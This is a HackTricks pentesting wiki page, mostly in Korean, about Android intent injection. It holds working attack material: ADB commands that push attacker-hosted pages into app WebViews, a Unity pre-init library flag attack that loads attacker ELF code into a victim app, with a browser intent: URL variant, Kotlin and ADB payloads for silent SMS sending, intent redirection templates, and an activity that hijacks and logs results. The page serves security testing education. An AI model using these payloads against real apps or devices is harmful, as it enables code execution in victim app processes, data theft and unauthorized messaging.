Intent Injection

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Intent injection은 공격자가 제어하는 Intents 또는 나중에 Intents로 변환되는 데이터를 허용하는 컴포넌트를 악용합니다. Android 앱 pentests 동안 매우 흔한 두 가지 패턴은 다음과 같습니다:

• 조작된 extras를 exported Activities/Services/BroadcastReceivers로 전달하고, 이들이 이후 권한이 있는 non-exported 컴포넌트로 전달되는 경우.
• 공격자가 제어하는 URL을 내부 WebView나 기타 민감한 sink로 전달하는 exported VIEW/BROWSABLE 딥 링크를 트리거하는 경우.

딥 링크 → WebView sink (URL 파라미터 인젝션)

앱이 다음과 같은 커스텀 스킴 딥 링크를 노출하는 경우:

myscheme://com.example.app/web?url=<attacker_url>

그리고 수신 Activity가 url 쿼리 매개변수를 WebView로 전달하면, 앱이 자체 WebView 컨텍스트에서 임의의 원격 콘텐츠를 렌더링하도록 강제할 수 있습니다.

adb를 통한 PoC:

# Implicit VIEW intent
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"

# Or explicitly target an Activity
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"

영향

• HTML/JS가 앱의 WebView 프로필 내에서 실행됩니다.
• JavaScript가 활성화되어 있으면(기본값이거나 검사 순서가 잘못된 경우) 노출된 @JavascriptInterface 객체를 열거/사용하고 WebView 쿠키/로컬 스토리지를 탈취하며 피벗할 수 있습니다.

See also:

Webview Attacks

검사 순서 버그로 인한 JavaScript 활성화

자주 발생하는 버그는 최종 URL 허용 목록/검증이 완료되기 전에 JavaScript(또는 기타 관대한 WebView 설정)를 활성화하는 것입니다. 초기 헬퍼가 당신의 딥 링크를 수락하고 WebView가 먼저 구성되면, 이후 검사가 잘못되었거나 너무 늦더라도 최종 로드는 이미 JavaScript가 활성화된 상태에서 발생합니다.

디컴파일된 코드에서 찾아볼 항목:

• URL을 다르게 파싱/분할/재구성하는 여러 헬퍼(정규화 불일치).
• 마지막 호스트/경로 허용 목록 검사 전에 getSettings().setJavaScriptEnabled(true)를 호출하는 부분.
• 파이프라인 예시: 파싱 → 부분 검증 → WebView 구성 → 최종 검증 → loadUrl.

Unity Runtime: Intent-to-CLI extras → 사전 초기화 네이티브 라이브러리 주입 (RCE)

Unity 기반 Android 앱은 일반적으로 진입 Activity로 com.unity3d.player.UnityPlayerActivity(또는 UnityPlayerGameActivity)를 사용합니다. Unity의 Android 템플릿은 unity라는 이름의 특별한 Intent extra를 Unity 런타임에 전달되는 명령줄 플래그 문자열로 취급합니다. 진입 Activity가 exported되어 있으면(많은 템플릿의 기본값), 로컬 앱 — 경우에 따라 BROWSABLE가 설정된 웹사이트도 — 이 extra를 제공할 수 있습니다.

위험하고 문서화되지 않은 플래그가 매우 초기 프로세스 초기화 중에 네이티브 코드 실행으로 이어집니다:

• 숨겨진 플래그: -xrsdk-pre-init-library <absolute-path>
• 효과: 초기화 단계 초기에 dlopen(<absolute-path>, RTLD_NOW)가 호출되어 공격자가 제어하는 ELF가 대상 앱 프로세스 내부에서 해당 UID와 권한으로 로드됩니다.

리버스 엔지니어링 발췌(단순화):

// lookup the arg value
initLibPath = FUN_00272540(uVar5, "xrsdk-pre-init-library");
// load arbitrary native library early
lVar2 = dlopen(initLibPath, 2); // RTLD_NOW

작동 원리

• The Intent extra unity는 Unity 런타임 플래그로 파싱됩니다.
• pre-init 플래그를 제공하면 Unity가 허용된 linker namespace 경로 내의 공격자 제어 ELF 경로를 가리키게 됩니다 (아래 제약 참조).

Conditions for exploitation

• Unity의 entry Activity는 exported되어 있습니다(일반적으로 기본값으로 true).
• 브라우저를 통한 원클릭 원격의 경우: entry Activity는 android.intent.category.BROWSABLE도 선언하여 intent: URL에서 extras를 전달할 수 있습니다.

Local exploitation (same device)

1. 피해자 앱이 읽을 수 있는 경로에 payload ELF를 배치합니다. 가장 쉬운 방법: 공격자 앱에 악성 라이브러리를 포함시켜 attacker의 manifest에 설정하여 /data/app/.../lib/<abi>/ 아래에 추출되도록 합니다:

<application android:extractNativeLibs="true" ...>

2. unity extra에서 CLI pre-init flag를 사용하여 피해자의 Unity activity를 실행합니다. ADB PoC 예시:

adb shell am start \
-n com.victim.pkg/com.unity3d.player.UnityPlayerActivity \
-e unity "-xrsdk-pre-init-library /data/app/~~ATTACKER_PKG==/lib/arm64/libpayload.so"

3. Unity calls dlopen("/data/.../libpayload.so", RTLD_NOW); your payload runs in the victim process, inheriting all its app permissions (카메라/마이크/네트워크/스토리지 등) 및 인앱 세션/데이터에 대한 접근 권한을 상속합니다.

Notes

• 정확한 /data/app/... 경로는 기기/설치마다 다릅니다. An attacker app는 런타임에 getApplicationInfo().nativeLibraryDir를 통해 자신의 native lib 디렉터리를 가져오고 이를 trigger에게 전달할 수 있습니다.
• 파일이 유효한 ELF라면 .so로 끝날 필요가 없습니다 – dlopen()은 확장자가 아니라 ELF 헤더를 검사합니다.

Remote one‑click via browser (conditional) If the Unity entry activity is exported with BROWSABLE, a website can pass extras via an intent: URL:

intent:#Intent;package=com.example.unitygame;scheme=whatever;\
S.unity=-xrsdk-pre-init-library%20/data/local/tmp/malicious.so;end;

그러나 최신 Android에서는 동적 링커 네임스페이스와 SELinux가 많은 공개 경로(예: /sdcard/Download)에서의 로딩을 차단합니다. 다음과 같은 오류가 표시될 것입니다:

library "/sdcard/Download/libtest.so" ("/storage/emulated/0/Download/libtest.so") needed
or dlopened by "/data/app/.../lib/arm64/libunity.so" is not accessible for the
namespace: [name="clns-...", ... permitted_paths="/data:/mnt/expand:/data/data/com.example.unitygame"]

우회 전략: 공격자가 제어하는 바이트를 앱의 private 스토리지 아래(예: HTTP caches)에 캐시하는 앱을 대상으로 합니다. 허용된 경로에 /data와 앱의 private dir가 포함되어 있으므로, -xrsdk-pre-init-library를 앱 캐시 내부의 절대 경로로 가리키면 링커 제약을 충족시켜 코드 실행을 얻을 수 있습니다. 이는 다른 Android 앱들에서 관찰된 이전의 cache-to-ELF RCE 패턴을 반영합니다.

Confused‑Deputy: ACTION_SENDTO를 통한 무음 SMS/MMS (Wear OS Google Messages)

일부 기본 메시징 앱은 암시적 메시징 intent를 잘못 자동 실행하여 이를 confused‑deputy primitive로 만듭니다: 권한 없는 앱이라도 Intent.ACTION_SENDTO를 sms:, smsto:, mms:, 또는 mmsto:와 함께 트리거해 확인 UI나 SEND_SMS 권한 없이 즉시 전송을 유발할 수 있습니다.

Key points

• Trigger: 암시적 ACTION_SENDTO + 메시징 URI 스킴.
• Data: 수신자는 URI에 설정, 메시지 텍스트는 "sms_body" extra에 설정.
• Permissions: 없음 (no SEND_SMS), 기본 SMS/MMS 핸들러에 의존.
• Observed: Google Messages for Wear OS (patched May 2025). 다른 핸들러도 유사하게 평가해야 합니다.

Minimal payload (Kotlin)

val intent = Intent(Intent.ACTION_SENDTO).apply {
data = Uri.parse("smsto:+11234567890") // or sms:, mms:, mmsto:
putExtra("sms_body", "Hi from PoC")
// From a non-Activity context add NEW_TASK
addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
}
startActivity(intent)

ADB PoC (특별 권한 불필요)

# SMS/SMS-to
adb shell am start -a android.intent.action.SENDTO -d "smsto:+11234567890" --es sms_body "hello"
adb shell am start -a android.intent.action.SENDTO -d "sms:+11234567890"   --es sms_body "hello"

# MMS/MMS-to (handler-dependent behaviour)
adb shell am start -a android.intent.action.SENDTO -d "mmsto:+11234567890" --es sms_body "hello"
adb shell am start -a android.intent.action.SENDTO -d "mms:+11234567890"   --es sms_body "hello"

공격 표면 확장 (Wear OS)

• 액티비티를 시작할 수 있는 모든 컴포넌트는 동일한 페이로드를 실행할 수 있습니다: Activities, foreground Services (with FLAG_ACTIVITY_NEW_TASK), Tiles, Complications.
• 기본 핸들러가 자동으로 전송하는 경우, OEM 정책에 따라 백그라운드 컨텍스트에서 원탭 또는 완전히 무음으로 악용될 수 있습니다.

Pentest checklist

• 대상에서 ACTION_SENDTO를 확인하여 기본 핸들러를 식별하고, 작성 UI를 표시하는지 또는 무음으로 전송하는지 확인합니다.
• 동작 차이를 확인하기 위해 네 가지 스킴 (sms:, smsto:, mms:, mmsto:) 및 extras (sms_body, 옵션으로 MMS의 subject)를 모두 테스트하세요.
• 실제 기기에서 테스트할 때 요금이 부과되는 목적지/유료 번호(premium‑rate numbers)를 고려하세요.

Other classic Intent injection primitives

• 공격자가 제공한 Intent extras를 사용하는 startActivity/sendBroadcast로, 이 extras가 나중에 재파싱(Intent.parseUri(...))되어 실행되는 경우.
• 권한 검사 없이 Intents를 non-exported 민감 컴포넌트로 전달하는 exported proxy 컴포넌트.

exported-component 테스트 자동화 (Smali-driven ADB generation)

exported 컴포넌트가 특정 extras를 기대할 때, 페이로드 형태를 추측하면 시간 낭비와 false negatives가 발생합니다. Smali에서 키/타입을 직접 자동으로 찾아내어 바로 실행 가능한 adb 명령을 출력할 수 있습니다.

Tool: APK Components Inspector

• Repo: https://github.com/thecybersandeep/apk-components-inspector
• Approach: Smali를 디컴파일하고 getStringExtra("key"), getIntExtra("id", ...), getParcelableExtra("redirect_intent"), getSerializableExtra(...), getBooleanExtra(...), getAction(), getData() 같은 호출을 스캔하여 각 컴포넌트가 소비하는 extras와 필드를 추론합니다.
• Output: 모든 exported Activity/Service/Receiver/Provider에 대해, 도구는 간단한 설명과 올바른 타입의 플래그가 적용된 정확한 adb shell am .../cmd content ... 명령을 출력합니다.

설치

git clone https://github.com/thecybersandeep/apk-components-inspector
cd apk-components-inspector
python3 -m venv venv && source venv/bin/activate
pip install androguard==3.3.5 rich

사용법

python apk-components-inspector.py target.apk

예시 출력

adb shell am start -n com.target/.ExportedActivity --es url https://example.tld
adb shell am startservice -n com.target/.ExportedService --ei user_id 1337 --ez force true
adb shell am broadcast -n com.target/.ExportedReceiver -a com.target.ACTION --es redirect_intent "intent:#Intent;component=com.target/.Internal;end"
adb shell cmd content query --uri content://com.target.provider/items

ADB am extras 치트시트 (타입 인식 플래그)

• 문자열: --es key value | 문자열 배열: --esa key v1,v2
• 정수: --ei key 123 | 정수 배열: --eia key 1,2,3
• 불리언: --ez key true|false
• Longs: --el key 1234567890
• 실수: --ef key 1.23
• URI (extra): --eu key content://... | Data URI (Intent data): -d content://...
• Component extra: --ecn key com.pkg/.Cls
• Null 문자열 extra: --esn key
• 공통 플래그: -a <ACTION> -c <CATEGORY> -t <MIME> -f <FLAGS> --activity-clear-task --activity-new-task

Providers를 위한 프로 팁

• 에이전트 없이 ContentProviders에 접근하려면 adb shell cmd content query|insert|update|delete ...를 사용하세요.
• SQLi 탐색을 위해, 기본 provider가 SQLite-backed인 경우 --projection과 --where (즉 selection)을 다양하게 시도하세요.

Full-pipeline automation (interactive executor)

# generate and capture commands then execute them one by one interactively
python apk-components-inspector.py app.apk | tee adbcommands.txt
python run_adb_commands.py

</details>

기기에서 실행: 인스펙터는 Python 기반이며 `apktool`/`androguard`가 사용 가능한 Termux 또는 루팅된 휴대폰에서 동작합니다.

---

## Intent Redirection (CWE-926) – finding and exploiting

패턴
- 외부에 노출된 엔트리 포인트(Activity/Service/Receiver)가 들어오는 Intent를 읽어 출처/데이터를 검증하지 않고 내부 또는 외부로 전달하는 경우, 예:
- `startActivity(getIntent())`
- `startActivity(intent)` (여기서 `intent`는 `redirect_intent`/`next_intent`/`pending_intent` 같은 extra에서 왔거나 `Intent.parseUri(...)`로 생성된 경우)
- 검증 없이 `action`/`data`/`component` 필드를 신뢰하거나 호출자 신원을 확인하지 않음.

Smali/Java에서 찾아야 할 항목
- `getParcelableExtra("redirect_intent")`, `getParcelable("intent")`, `getIntent().getParcelableExtra(...)` 등의 사용 여부.
- 공격자가 조작한 Intent에 대해 직접 `startActivity(...)`, `startService(...)`, `sendBroadcast(...)` 호출.
- `getCallingPackage()`/`getCallingActivity()` 검사나 커스텀 권한 검증이 없는 경우.

ADB PoC 템플릿
- 프록시 Activity가 추가 Intent를 권한 있는 내부 Activity로 전달:
```bash
adb shell am start -n com.target/.ProxyActivity \
--es redirect_intent 'intent:#Intent;component=com.target/.SensitiveActivity;end'

adb shell am startservice -n com.target/.ExportedService \
--es redirect_intent 'intent:#Intent;component=com.target/.PrivService;action=com.target.DO;end'

adb shell am broadcast -n com.target/.RelayReceiver -a com.target.RELAY \
--es forwarded 'intent:#Intent;component=com.target/.HiddenActivity;S.extra=1;end'

# Ensure a fresh task when testing Activities that check task/intent flags
adb shell am start -n com.target/.ExportedActivity --activity-clear-task --activity-new-task

<activity android:name=".StealActivity" android:exported="true">
<intent-filter>
<action android:name="com.victim.app.ACTION_CALLBACK"/>
<category android:name="android.intent.category.DEFAULT"/>
<!-- Optionally constrain MIME or scheme/host/path to increase match score -->
<!-- <data android:mimeType="application/json"/> -->
<!-- <data android:scheme="myscheme" android:host="callback"/> -->
</intent-filter>
</activity>

public class StealActivity extends Activity {
@Override protected void onCreate(Bundle b) {
super.onCreate(b);
Intent i = getIntent();
Bundle extras = i.getExtras();
Uri data = i.getData();
// Dump/forward sensitive result
android.util.Log.i("HIJACK", "action="+i.getAction()+" data="+data+" extras="+extras);
finish();
}
}

Intent intent = new Intent();
intent.setAction("android.media.action.IMAGE_CAPTURE");
intent.addFlags(Intent.FLAG_DEBUG_LOG_RESOLUTION);
startActivityForResult(intent, 42);

# You can also set the debug flag from adb when firing an implicit Intent
# 0x00000008 == Intent.FLAG_DEBUG_LOG_RESOLUTION on modern Android
adb shell am start -a android.media.action.IMAGE_CAPTURE -f 0x00000008

# Then inspect the resolution in logs
adb logcat | grep -i -E "resolve|Resolver|PackageManager|ActivityTaskManager"